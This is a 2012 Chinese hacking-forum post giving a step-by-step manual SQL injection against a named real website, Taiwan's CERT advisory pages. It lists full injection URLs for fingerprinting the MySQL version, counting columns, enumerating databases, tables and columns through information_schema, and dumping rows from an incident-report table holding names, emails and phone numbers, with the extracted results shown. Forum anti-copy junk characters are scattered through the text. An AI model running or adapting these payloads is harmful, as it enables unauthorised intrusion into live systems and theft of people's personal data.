找回密码
 立即注册
查看: 2395|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询3 ^8 ]: ?/ n! {' T/ V. V
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
9 F& \  e9 |( }& nhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
/ ~& S( u5 o: n# ?2 q3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--5 z! J$ T/ f! J6 u' F; F4 J, a
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。- |" Y: A9 k3 K* V' s8 e: |
4.判断有没有写权限
3 u7 D: \4 Z$ T) H, C6 {# X2 uhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限, a/ P+ b1 L. i4 s1 b+ N
没办法,手动猜表啦# ?: e3 K" |3 Z6 p
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
$ r0 k$ ^6 O$ R( \# c, x/ k# n但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下: t. D6 K) I) F8 D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
* u8 }* w: I6 l0 h成功查出所有数据库,国外的黑客就是不一般。数据库如下:
  U* G% G6 i  H( Q+ t5 Uinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb0 x7 N5 M3 [" \* I5 w  Y5 K2 `) \
6.爆表,爆的是twcert库" H' p+ C) y2 u+ S% {
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--! O* ?( X' o' _1 u0 z
爆出如下表6 C$ @6 _% }# L
downloadfile,irsys,newsdata,secrpt,secrpt_big5& K. N" ^/ \  M+ U" a* B, R- A3 A
7.爆列名,这次爆的是irsys表
) L. V) K9 q! k& dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
$ ?+ p4 m$ Y" y( G& n9 C. z爆出如下列) ^9 g9 h0 N+ p: j3 L* ]$ f
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
" _2 |! u$ ?/ {8 V7 F1 z8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。' Q6 g# F- E7 B1 U, N& g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--4 A' b8 P5 I0 r* ^: p
返回是3,说明每个列里有3个地段
+ s! W$ b" ?" G2 c( [/ u8 ^; s9.爆字段内容
0 e! u2 C* Q) W/ r& v4 \8 X5 M% Vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
+ B' }/ T9 i; T6 v$ P0 h6 i  r爆出name列的第一个字段的内容
0 E  y5 D( k. s5 `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
+ n3 T/ }) X6 t; T5 H; |爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表